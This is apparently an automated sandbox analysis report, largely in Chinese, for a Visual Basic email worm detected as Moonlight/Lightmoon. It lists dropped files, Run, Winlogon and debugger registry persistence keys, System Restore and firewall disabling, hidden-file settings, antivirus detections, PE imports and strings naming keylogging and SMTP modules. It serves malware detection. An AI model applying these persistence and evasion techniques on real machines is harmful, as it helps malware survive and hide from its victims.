EbGetHandleOfExecutingProject+0x22b3 rtcPackDate-0xba9 msvbvm60+0xd0dcf @ 0x72a10dcf
rtcDoEvents+0x131 __vbaError-0x626 msvbvm60+0xce228 @ 0x72a0e228

success 0 0
1727545329.43725
__exception__
exception.address: 0x76e8b727
exception.instruction: leave
exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.exception_code: 0xc000008f
registers.eax: 1634480
registers.ecx: 2
registers.edx: 0
registers.ebx: 6247808
registers.esp: 1634480
registers.ebp: 1634560
registers.esi: 6247808
registers.edi: 6247808
stacktrace:
EbGetHandleOfExecutingProject+0x22b3 rtcPackDate-0xba9 msvbvm60+0xd0dcf @ 0x72a10dcf
rtcDoEvents+0x131 __vbaError-0x626 msvbvm60+0xce228 @ 0x72a0e228

success 0 0
1727545329.43725
__exception__
exception.address: 0x76e8b727
exception.instruction: leave
exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.exception_code: 0xc000008f
registers.eax: 1634480
registers.ecx: 2
registers.edx: 0
registers.ebx: 6247808
registers.esp: 1634480
registers.ebp: 1634560
registers.esi: 6247808
registers.edi: 6247808
stacktrace:
EbGetHandleOfExecutingProject+0x22b3 rtcPackDate-0xba9 msvbvm60+0xd0dcf @ 0x72a10dcf
rtcDoEvents+0x131 __vbaError-0x626 msvbvm60+0xce228 @ 0x72a0e228

success 0 0
1727545329.45325
__exception__
exception.address: 0x76e8b727
exception.instruction: leave
exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.exception_code: 0xc000008f
registers.eax: 1634480
registers.ecx: 2
registers.edx: 0
registers.ebx: 6247808
registers.esp: 1634480
registers.ebp: 1634560
registers.esi: 6247808
registers.edi: 6247808
stacktrace:
EbGetHandleOfExecutingProject+0x22b3 rtcPackDate-0xba9 msvbvm60+0xd0dcf @ 0x72a10dcf
rtcDoEvents+0x131 __vbaError-0x626 msvbvm60+0xce228 @ 0x72a0e228

success 0 0
1727545329.54725
__exception__
exception.address: 0x76e8b727
exception.instruction: leave
exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.exception_code: 0xc000008f
registers.eax: 1634480
registers.ecx: 2
registers.edx: 0
registers.ebx: 6247808
registers.esp: 1634480
registers.ebp: 1634560
registers.esi: 6247808
registers.edi: 6247808
stacktrace:
EbGetHandleOfExecutingProject+0x22b3 rtcPackDate-0xba9 msvbvm60+0xd0dcf @ 0x72a10dcf
rtcDoEvents+0x131 __vbaError-0x626 msvbvm60+0xce228 @ 0x72a0e228

success 0 0
1727545329.56225
__exception__
exception.address: 0x76e8b727
exception.instruction: leave
exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.exception_code: 0xc000008f
registers.eax: 1634480
registers.ecx: 2
registers.edx: 0
registers.ebx: 6247808
registers.esp: 1634480
registers.ebp: 1634560
registers.esi: 6247808
registers.edi: 6247808
stacktrace:
EbGetHandleOfExecutingProject+0x22b3 rtcPackDate-0xba9 msvbvm60+0xd0dcf @ 0x72a10dcf
rtcDoEvents+0x131 __vbaError-0x626 msvbvm60+0xce228 @ 0x72a0e228

success 0 0
1727545329.015375
__exception__
exception.address: 0x76e8b727
exception.instruction: leave
exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.exception_code: 0xc000008f
registers.eax: 1635080
registers.ecx: 2
registers.edx: 0
registers.ebx: 6444384
registers.esp: 1635080
registers.ebp: 1635160
registers.esi: 6444384
registers.edi: 6444384
stacktrace:
EbGetHandleOfExecutingProject+0x22b3 rtcPackDate-0xba9 msvbvm60+0xd0dcf @ 0x72a10dcf
rtcDoEvents+0x131 __vbaError-0x626 msvbvm60+0xce228 @ 0x72a0e228

success 0 0
1727545329.015375
__exception__
exception.address: 0x76e8b727
exception.instruction: leave
exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.exception_code: 0xc000008f
registers.eax: 1635080
registers.ecx: 2
registers.edx: 0
registers.ebx: 6444384
registers.esp: 1635080
registers.ebp: 1635160
registers.esi: 6444384
registers.edi: 6444384
stacktrace:
EbGetHandleOfExecutingProject+0x22b3 rtcPackDate-0xba9 msvbvm60+0xd0dcf @ 0x72a10dcf
rtcDoEvents+0x131 __vbaError-0x626 msvbvm60+0xce228 @ 0x72a0e228

success 0 0
1727545329.078375
__exception__
exception.address: 0x76e8b727
exception.instruction: leave
exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.exception_code: 0xc000008f
registers.eax: 1634668
registers.ecx: 2
registers.edx: 0
registers.ebx: 6444384
registers.esp: 1634668
registers.ebp: 1634748
registers.esi: 6444384
registers.edi: 6444384
stacktrace:
EbGetHandleOfExecutingProject+0x22b3 rtcPackDate-0xba9 msvbvm60+0xd0dcf @ 0x72a10dcf
rtcDoEvents+0x131 __vbaError-0x626 msvbvm60+0xce228 @ 0x72a0e228

success 0 0
1727545329.093375
__exception__
exception.address: 0x76e8b727
exception.instruction: leave
exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.exception_code: 0xc000008f
registers.eax: 1635196
registers.ecx: 2
registers.edx: 0
registers.ebx: 6444384
registers.esp: 1635196
registers.ebp: 1635276
registers.esi: 6444384
registers.edi: 6444384
stacktrace:
EbGetHandleOfExecutingProject+0x22b3 rtcPackDate-0xba9 msvbvm60+0xd0dcf @ 0x72a10dcf
rtcDoEvents+0x131 __vbaError-0x626 msvbvm60+0xce228 @ 0x72a0e228

success 0 0
行为判定
动态指标
在文件系统上创建可执行文件 (20 个事件)
file C:\Windows\KQW3X6L.{645FF040-5081-101B-9F08-00AA002F954E}\winlogon.exe
file C:\Windows\System32\JIL8R7E.exe
file C:\Users\Administrator\Documents\My Music\My Music.exe
file C:\Windows\WEN2I2H.exe
file C:\Users\Administrator\Documents\My Pictures\My Pictures.exe
file C:\Windows\KQW3X6L.{645FF040-5081-101B-9F08-00AA002F954E}\regedit.cmd
file C:\Windows\System32\OGH7K8U\VQP2W7R.cmd
file C:\Users\Administrator\Documents\My Videos\My Videos.exe
file C:\Windows\System32\VQP2W7RWEN2I2H.exe
file C:\Windows\RTG8O1T.exe
file C:\Windows\cypreg.dll
file C:\Windows\KQW3X6L.{645FF040-5081-101B-9F08-00AA002F954E}\smss.exe
file C:\Windows\KQW3X6L.{645FF040-5081-101B-9F08-00AA002F954E}\TMS5F3L.exe
file C:\Windows\System32\systear.dll
file C:\Windows\KQW3X6L.{645FF040-5081-101B-9F08-00AA002F954E}\service.exe
file C:\Windows\system\msvbvm60.dll
file C:\Windows\moonlight.dll
file C:\Windows\KQW3X6L.{645FF040-5081-101B-9F08-00AA002F954E}\system.exe
file C:\Windows\KQW3X6L.{645FF040-5081-101B-9F08-00AA002F954E}\NRN8R6K.com
file C:\Windows\lsass.exe
创建隐藏或系统文件 (6 个事件)
Time & API Arguments Status Return Repeated
1727545328.342875
SetFileAttributesW
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath: C:\Windows\System32\OGH7K8U
filepath_r: C:\Windows\system32\OGH7K8U
failed 0 0
1727545328.95325
SetFileAttributesW
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath: C:\Windows\System32\OGH7K8U
filepath_r: C:\Windows\system32\OGH7K8U
success 1 0
1727545329.015375
SetFileAttributesW
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath: C:\Windows\System32\OGH7K8U
filepath_r: C:\Windows\system32\OGH7K8U
success 1 0
1727545329.04725
SetFileAttributesW
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath: C:\Windows\System32\OGH7K8U
filepath_r: C:\Windows\system32\OGH7K8U
success 1 0
1727545329.078125
SetFileAttributesW
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath: C:\Windows\System32\OGH7K8U
filepath_r: C:\Windows\system32\OGH7K8U
success 1 0
1727545330.07875
SetFileAttributesW
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath: C:\Windows\System32\OGH7K8U
filepath_r: C:\Windows\system32\OGH7K8U
success 1 0
投放一个二进制文件并执行它 (4 个事件)
file C:\Windows\KQW3X6L.{645FF040-5081-101B-9F08-00AA002F954E}\service.exe
file C:\Windows\KQW3X6L.{645FF040-5081-101B-9F08-00AA002F954E}\smss.exe
file C:\Windows\KQW3X6L.{645FF040-5081-101B-9F08-00AA002F954E}\system.exe
file C:\Windows\KQW3X6L.{645FF040-5081-101B-9F08-00AA002F954E}\winlogon.exe
将读写内存保护更改为可读执行(可能是为了避免在同时设置所有 RWX 标志时被检测) (12 个事件)
Time & API Arguments Status Return Repeated
1727545327.405875
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x003c0000
length: 24576
protection: 32 (PAGE_EXECUTE_READ)
process_identifier: 2400
success 0 0
1727545327.436875
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x003c0000
length: 40960
protection: 32 (PAGE_EXECUTE_READ)
process_identifier: 2400
success 0 0
1727545328.75025
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x004b0000
length: 24576
protection: 32 (PAGE_EXECUTE_READ)
process_identifier: 2708
success 0 0
1727545328.76525
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x004b0000
length: 40960
protection: 32 (PAGE_EXECUTE_READ)
process_identifier: 2708
success 0 0
1727545328.812375
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x00360000
length: 24576
protection: 32 (PAGE_EXECUTE_READ)
process_identifier: 2404
success 0 0
1727545328.828375
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x00360000
length: 40960
protection: 32 (PAGE_EXECUTE_READ)
process_identifier: 2404
success 0 0
1727545328.87525
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x00510000
length: 24576
protection: 32 (PAGE_EXECUTE_READ)
process_identifier: 2492
success 0 0
1727545328.89025
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x00510000
length: 40960
protection: 32 (PAGE_EXECUTE_READ)
process_identifier: 2492
success 0 0
1727545328.937125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x00740000
length: 24576
protection: 32 (PAGE_EXECUTE_READ)
process_identifier: 1836
success 0 0
1727545328.953125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x00740000
length: 40960
protection: 32 (PAGE_EXECUTE_READ)
process_identifier: 1836
success 0 0
1727545329.28175
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x00450000
length: 24576
protection: 32 (PAGE_EXECUTE_READ)
process_identifier: 1176
success 0 0
1727545329.28175
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x00450000
length: 40960
protection: 32 (PAGE_EXECUTE_READ)
process_identifier: 1176
success 0 0
网络通信
与未执行 DNS 查询的主机进行通信 (2 个事件)
host 114.114.114.114
host 8.8.8.8
检查已知调试器和取证工具窗口的存在 (50 out of 383 个事件)
Time & API Arguments Status Return Repeated
1727545329.139875
FindWindowA
window_name:
class_name: ThunderRT6FormDC
failed 0 0
1727545329.81225
FindWindowA
window_name:
class_name: ThunderRT6FormDC
success 590356 0
1727545330.81225
FindWindowA
window_name:
class_name: ThunderRT6FormDC
failed 0 0
1727545331.81225
FindWindowA
window_name:
class_name: ThunderRT6FormDC
failed 0 0
1727545332.82825
FindWindowA
window_name:
class_name: ThunderRT6FormDC
failed 0 0
1727545333.82825
FindWindowA
window_name:
class_name: ThunderRT6FormDC
failed 0 0
1727545334.84325
FindWindowA
window_name:
class_name: ThunderRT6FormDC
failed 0 0
1727545335.84325
FindWindowA
window_name:
class_name: ThunderRT6FormDC
failed 0 0
1727545336.85925
FindWindowA
window_name:
class_name: ThunderRT6FormDC
failed 0 0
1727545337.87525
FindWindowA
window_name:
class_name: ThunderRT6FormDC
failed 0 0
1727545338.87525
FindWindowA
window_name:
class_name: ThunderRT6FormDC
failed 0 0
1727545339.89025
FindWindowA
window_name:
class_name: ThunderRT6FormDC
failed 0 0
1727545340.89025
FindWindowA
window_name:
class_name: ThunderRT6FormDC
failed 0 0
1727545341.90625
FindWindowA
window_name:
class_name: ThunderRT6FormDC
failed 0 0
1727545342.90625
FindWindowA
window_name:
class_name: ThunderRT6FormDC
failed 0 0
1727545343.90625
FindWindowA
window_name:
class_name: ThunderRT6FormDC
failed 0 0
1727545344.90625
FindWindowA
window_name:
class_name: ThunderRT6FormDC
failed 0 0
1727545345.90625
FindWindowA
window_name:
class_name: ThunderRT6FormDC
failed 0 0
1727545346.90625
FindWindowA
window_name:
class_name: ThunderRT6FormDC
failed 0 0
1727545347.90625
FindWindowA
window_name:
class_name: ThunderRT6FormDC
failed 0 0
1727545348.90625
FindWindowA
window_name:
class_name: ThunderRT6FormDC
failed 0 0
1727545349.90625
FindWindowA
window_name:
class_name: ThunderRT6FormDC
failed 0 0
1727545350.90625
FindWindowA
window_name:
class_name: ThunderRT6FormDC
failed 0 0
1727545351.90625
FindWindowA
window_name:
class_name: ThunderRT6FormDC
failed 0 0
1727545352.90625
FindWindowA
window_name:
class_name: ThunderRT6FormDC
failed 0 0
1727545353.90625
FindWindowA
window_name:
class_name: ThunderRT6FormDC
failed 0 0
1727545354.90625
FindWindowA
window_name:
class_name: ThunderRT6FormDC
failed 0 0
1727545355.90625
FindWindowA
window_name:
class_name: ThunderRT6FormDC
failed 0 0
1727545356.92225
FindWindowA
window_name:
class_name: ThunderRT6FormDC
failed 0 0
1727545357.93725
FindWindowA
window_name:
class_name: ThunderRT6FormDC
failed 0 0
1727545358.93725
FindWindowA
window_name:
class_name: ThunderRT6FormDC
failed 0 0
1727545359.93725
FindWindowA
window_name:
class_name: ThunderRT6FormDC
failed 0 0
1727545360.95325
FindWindowA
window_name:
class_name: ThunderRT6FormDC
failed 0 0
1727545361.95325
FindWindowA
window_name:
class_name: ThunderRT6FormDC
failed 0 0
1727545362.95325
FindWindowA
window_name:
class_name: ThunderRT6FormDC
failed 0 0
1727545363.96825
FindWindowA
window_name:
class_name: ThunderRT6FormDC
failed 0 0
1727545364.96825
FindWindowA
window_name:
class_name: ThunderRT6FormDC
failed 0 0
1727545365.96825
FindWindowA
window_name:
class_name: ThunderRT6FormDC
failed 0 0
1727545366.96825
FindWindowA
window_name:
class_name: ThunderRT6FormDC
failed 0 0
1727545367.96825
FindWindowA
window_name:
class_name: ThunderRT6FormDC
failed 0 0
1727545368.98425
FindWindowA
window_name:
class_name: ThunderRT6FormDC
failed 0 0
1727545369.98425
FindWindowA
window_name:
class_name: ThunderRT6FormDC
failed 0 0
1727545371.00025
FindWindowA
window_name:
class_name: ThunderRT6FormDC
failed 0 0
1727545372.00025
FindWindowA
window_name:
class_name: ThunderRT6FormDC
failed 0 0
1727545373.01525
FindWindowA
window_name:
class_name: ThunderRT6FormDC
failed 0 0
1727545374.03125
FindWindowA
window_name:
class_name: ThunderRT6FormDC
failed 0 0
1727545375.03125
FindWindowA
window_name:
class_name: ThunderRT6FormDC
failed 0 0
1727545376.03125
FindWindowA
window_name:
class_name: ThunderRT6FormDC
failed 0 0
1727545377.03125
FindWindowA
window_name:
class_name: ThunderRT6FormDC
failed 0 0
1727545378.03125
FindWindowA
window_name:
class_name: ThunderRT6FormDC
failed 0 0
在 Windows 启动时自我安装以实现自动运行 (7 个事件)
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\sQW8O1T0 reg_value C:\Windows\system32\VQP2W7RWEN2I2H.exe
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RUN\0F3LEN reg_value C:\Windows\RTG8O1T.exe
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell reg_value explorer.exe, "C:\Windows\KQW3X6L.{645FF040-5081-101B-9F08-00AA002F954E}\TMS5F3L.exe"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\LOAD reg_value "C:\Windows\KQW3X6L.{645FF040-5081-101B-9F08-00AA002F954E}\NRN8R6K.com"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\debugger reg_value C:\Windows\notepad.exe
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\debugger reg_value C:\Windows\KQW3X6L.{645FF040-5081-101B-9F08-00AA002F954E}\regedit.cmd
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe\debugger reg_value C:\Windows\notepad.exe
创建已知的 Bublik 木马文件、注册表项和/或互斥体 (1 个事件)
registry HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden
禁用代理,可能用于流量拦截 (1 个事件)
Time & API Arguments Status Return Repeated
1727545339.85925
RegSetValueExA
key_handle: 0x000002d8
regkey_r: ProxyEnable
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
value: 0
success 0 0
尝试禁用系统还原 (2 个事件)
registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableSR
registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableConfig
尝试修改资源管理器设置以防止文件扩展名显示 (1 个事件)
registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt
尝试修改资源管理器设置以防止显示隐藏文件 (2 个事件)
registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden
创建一个命名为常见系统进程的进程 (2 个事件)
Time & API Arguments Status Return Repeated
1727545329.139875
CreateProcessInternalW
command_line: "C:\Windows\lsass.exe"
inherit_handles: 0
current_directory: C:\Users\Administrator\AppData\Local\Temp
filepath: C:\Windows\lsass.exe
filepath_r: C:\Windows\lsass.exe
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
process_identifier: 1176
thread_identifier: 2448
process_handle: 0x000003b4
thread_handle: 0x000003a8
track: 1
success 1 0
1727545329.139875
ShellExecuteExW
filepath: C:\Windows\lsass.exe
filepath_r: C:\Windows\lsass.exe
parameters:
show_type: 1
success 1 0
停止 Windows 服务 (1 个事件)
service SharedAccess (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Start)
连接到不再响应请求的 IP 地址(合法服务通常会保持运行) (1 个事件)
dead_host 199.59.148.96:80
文件已被 VirusTotal 上 56 个反病毒引擎识别为恶意 (50 out of 56 个事件)
APEX Malicious
AVG Win32:Trojan-gen
Acronis suspicious
Ad-Aware Gen:Trojan.Heur.Or3@sHCxibgib
AhnLab-V3 Worm/Win32.AutoRun.R241883
Antiy-AVL Trojan/Win32.Genome
Arcabit Trojan.Heur.ED4195
Avast Win32:Trojan-gen
Avira TR/Moonlight.DLL.Dam
Baidu Win32.Worm.VB.a
BitDefender Gen:Trojan.Heur.Or3@sHCxibgib
CAT-QuickHeal Trojan.Sigmal.S6388985
CMC Email-Worm.Win32.VB!O
ClamAV Win.Malware.Lmvwkprng-6742707-0
Comodo Packed.Win32.MUPX.Gen@24tbus
CrowdStrike win/malicious_confidence_100% (D)
Cybereason malicious.a8d838
Cylance Unsafe
Cyren W32/Noon.K.gen!Eldorado
DrWeb Trojan.DownLoader6.64360
ESET-NOD32 Win32/NoonLight.Y
Emsisoft Gen:Trojan.Heur.Or3@sHCxibgib (B)
Endgame malicious (high confidence)
F-Prot W32/VBTrojan.17E!Maximus
F-Secure Trojan.TR/Moonlight.DLL.Dam
FireEye Generic.mg.abc5284a8d838739
Fortinet W32/MoonLight.BA!worm
GData Gen:Trojan.Heur.Or3@sHCxibgib
Ikarus Trojan.Win32.Patched
Invincea heuristic
Jiangmin Worm/VB.a
K7AntiVirus Trojan ( 0040f6141 )
K7GW Trojan ( 0040f6141 )
Kaspersky Email-Worm.Win32.VB.co
MAX malware (ai score=81)
Malwarebytes Worm.Agent
MaxSecure Trojan.Malware.121218.susgen
McAfee W32/MoonLight.worm.b
McAfee-GW-Edition BehavesLike.Win32.Rontokbro.tm
MicroWorld-eScan Gen:Trojan.Heur.Or3@sHCxibgib
Microsoft Worm:Win32/Lightmoon.H
NANO-Antivirus Trojan.Win32.VB.foifdq
Panda W32/Moonlight.P.worm
Qihoo-360 HEUR/QVM41.1.4DC5.Malware.Gen
Rising Worm.VBInjectEx!1.99E6 (CLASSIC)
SUPERAntiSpyware Worm.Lightmoon/Variant
SentinelOne DFI - Malicious PE
Sophos W32/Bobandy-I
Symantec W32.Lunalight@mm
VBA32 Trojan.VBRA.03577
可视化分析
二进制图像
数据导入图像 288x288
数据导入图像 224x224
数据导入图像 192x192
数据导入图像 160x160
数据导入图像 128x128
数据导入图像 96x96
数据导入图像 64x64
数据导入图像 32x32
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

2007-01-09 09:10:21

PE Imphash

8fdfdc49a8e6746c0d29e7ec135a6204

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
HSP0 0x00001000 0x0002c000 0x0002c000 5.756509308700437
HSP1 0x0002d000 0x0001f000 0x0001ec00 6.578913358656656
.rsrc 0x0004c000 0x00003000 0x00002200 4.040850426881186
.imports 0x0004f000 0x00001000 0x00000a00 4.023603122426431

Resources

Name Offset Size Language Sub-language File type
MIDI 0x00047530 0x000021b0 LANG_ENGLISH SUBLANG_ENGLISH_US None
ZIP 0x00037130 0x00010400 LANG_ENGLISH SUBLANG_ENGLISH_US None
RT_ICON 0x0004d008 0x00000ea8 LANG_NEUTRAL SUBLANG_NEUTRAL None
RT_ICON 0x0004d008 0x00000ea8 LANG_NEUTRAL SUBLANG_NEUTRAL None
RT_ICON 0x0004d008 0x00000ea8 LANG_NEUTRAL SUBLANG_NEUTRAL None
RT_GROUP_ICON 0x0004deb4 0x00000030 LANG_NEUTRAL SUBLANG_NEUTRAL None
RT_VERSION 0x0004dee8 0x00000258 LANG_ENGLISH SUBLANG_ENGLISH_US None

Imports

Library MSVBVM60.DLL:
0x401000 __vbaVarSub
0x401004 __vbaVarTstGt
0x401008 __vbaStrI2
0x40100c _CIcos
0x401010 _adj_fptan
0x401014 __vbaStrI4
0x401018 __vbaVarMove
0x40101c __vbaVarVargNofree
0x401020 __vbaAryMove
0x401024 __vbaFreeVar
0x401028 __vbaStrVarMove
0x40102c __vbaLenBstr
0x401030 __vbaPut3
0x401034 __vbaEnd
0x401038 __vbaFreeVarList
0x40103c _adj_fdiv_m64
0x401040 __vbaPut4
0x401044 __vbaFreeObjList
0x401048 None
0x40104c _adj_fprem1
0x401050 __vbaRecAnsiToUni
0x401054 None
0x401058 None
0x40105c __vbaVarCmpNe
0x401060 __vbaStrCat
0x401064 None
0x401068 __vbaLsetFixstr
0x40106c __vbaRecDestruct
0x401070 __vbaSetSystemError
0x401074 __vbaNameFile
0x40107c __vbaLenVar
0x401080 _adj_fdiv_m32
0x401084 __vbaVarXor
0x401088 __vbaAryDestruct
0x401090 None
0x401094 __vbaVarForInit
0x401098 __vbaExitProc
0x40109c None
0x4010a0 __vbaObjSet
0x4010a4 __vbaStrLike
0x4010a8 __vbaOnError
0x4010ac None
0x4010b0 _adj_fdiv_m16i
0x4010b4 __vbaObjSetAddref
0x4010b8 _adj_fdivr_m16i
0x4010bc __vbaVarIndexLoad
0x4010c0 None
0x4010c4 __vbaStrFixstr
0x4010c8 None
0x4010cc __vbaVargVar
0x4010d0 __vbaBoolVarNull
0x4010d4 __vbaRefVarAry
0x4010d8 _CIsin
0x4010dc None
0x4010e0 None
0x4010e4 __vbaErase
0x4010e8 __vbaVarZero
0x4010ec None
0x4010f0 None
0x4010f4 __vbaChkstk
0x4010f8 None
0x4010fc __vbaGosubFree
0x401100 __vbaFileClose
0x401104 EVENT_SINK_AddRef
0x401108 None
0x40110c None
0x401110 __vbaGet3
0x401114 __vbaStrCmp
0x401118 None
0x40111c __vbaAryConstruct2
0x401120 __vbaGet4
0x401124 __vbaVarTstEq
0x401128 __vbaPutOwner3
0x40112c None
0x401130 __vbaObjVar
0x401134 DllFunctionCall
0x401138 __vbaVarLateMemSt
0x40113c __vbaVarOr
0x401140 _adj_fpatan
0x401148 __vbaRedim
0x40114c __vbaRecUniToAnsi
0x401150 EVENT_SINK_Release
0x401154 __vbaNew
0x401158 None
0x40115c None
0x401160 _CIsqrt
0x401164 __vbaVarAnd
0x40116c __vbaStrUI1
0x401170 __vbaVarMul
0x401174 __vbaExceptHandler
0x401178 None
0x40117c __vbaPrintFile
0x401180 __vbaStrToUnicode
0x401184 None
0x401188 None
0x40118c _adj_fprem
0x401190 _adj_fdivr_m64
0x401194 __vbaGosub
0x401198 None
0x40119c None
0x4011a0 None
0x4011a4 __vbaFPException
0x4011a8 __vbaInStrVar
0x4011ac __vbaUbound
0x4011b0 __vbaStrVarVal
0x4011b4 __vbaGetOwner3
0x4011b8 __vbaVarCat
0x4011bc None
0x4011c0 __vbaI2Var
0x4011c4 None
0x4011c8 None
0x4011cc _CIlog
0x4011d0 __vbaFileOpen
0x4011d4 None
0x4011d8 __vbaR8Str
0x4011dc __vbaVar2Vec
0x4011e0 __vbaInStr
0x4011e4 None
0x4011e8 __vbaNew2
0x4011ec _adj_fdiv_m32i
0x4011f0 None
0x4011f4 _adj_fdivr_m32i
0x4011f8 __vbaStrCopy
0x4011fc None
0x401200 __vbaFreeStrList
0x401204 _adj_fdivr_m32
0x401208 __vbaPowerR8
0x40120c _adj_fdiv_r
0x401210 None
0x401214 None
0x401218 __vbaVarTstNe
0x40121c __vbaVarSetVar
0x401220 __vbaI4Var
0x401224 __vbaVarCmpEq
0x401228 None
0x40122c __vbaAryLock
0x401230 __vbaLateMemCall
0x401234 __vbaVarAdd
0x401238 None
0x40123c __vbaStrToAnsi
0x401240 __vbaVarDup
0x401244 __vbaVarMod
0x401248 __vbaFpI4
0x401250 __vbaVarCopy
0x401254 None
0x401260 __vbaLateMemCallLd
0x401264 __vbaR8IntI2
0x401268 None
0x40126c _CIatan
0x401270 None
0x401274 __vbaStrMove
0x401278 None
0x40127c __vbaStrVarCopy
0x401280 None
0x401284 None
0x401288 _allmul
0x40128c _CItan
0x401290 None
0x401294 __vbaUI1Var
0x401298 __vbaAryUnlock
0x40129c __vbaVarForNext
0x4012a0 _CIexp
0x4012a4 __vbaI4ErrVar
0x4012a8 None
0x4012ac __vbaFreeStr
0x4012b0 __vbaFreeObj

L!This program cannot be run in DOS mH
.imports
NewMoonlight
FrmMain
ddddddddddddd
IIIIIIIIIIIIIId7I
ttttttttj
<<<<<<<T
1111111(o
Id7(1IIIIIIIIIIII
IIIII`
[fPFMlllll
[sTtpk_glllll
[wwwwnhGFlllll
[i>wTTTTTTTTwpNIMlll
[i)<<<<<<<<<<<<<<:nK_l
[i}<<<<<<<<<<<<<<<<<wl
[c*(((((((((((((((((wl
[>6cj0
"' 6Hx
.LjR=W
.Jbjx=l
[[[[[Y
[[[[[[
[[[[[[[
[q~b[Fllll
[c}ha[]dlll
[f}nKB\`lll
[f}ttttttttttnKG[llll
[@SStha[llll
[XwwwwwwwwwwwwwwSSSTTpNJBllll
[SSSSSSSSSSSSSSTTTTTTTTT:kK^l
[<<<<<<<<<<<<<<<<<<<<<<<<<<u9l
[A><<<<<<<<<<<<<<<<<<<<<<<<<<l
[V211111111111111111111111111l
[2(((((((((((((((((((((((((([l
[|%##########################Kl
[*'5[Dj{
"'/5H[DPY
! 6J[[Lj=
! 6J[[DDDDl
-Yjoz{
[[[[[jxzW
[[[[[[[[
[[[[[[[[7
MS Sans Serif
TxtCaption
TmrKeyLog
TmrTungguconect
TmrDos
Timer3
Timer2
VB5!*
FILE FOLDER
NewMoonlight
6d":hNc
global
Utilities
ScanEmail
FrmMain
basRegistry
modInet
newSmtp
basService
keylog
ModSmtpEngine
Modzip
ModNetwork
ModMoonUpdate
Modmidi
Modhtt
NewMoonlight
shell32.dll
ShellExecuteA
kernel32
GetWindowsDirectoryA
GetSystemDirectoryA
user32.dll
EnumWindows
user32
EnableWindow
GetParent
ShowWindow
GetWindowTextA
GetClassNameA
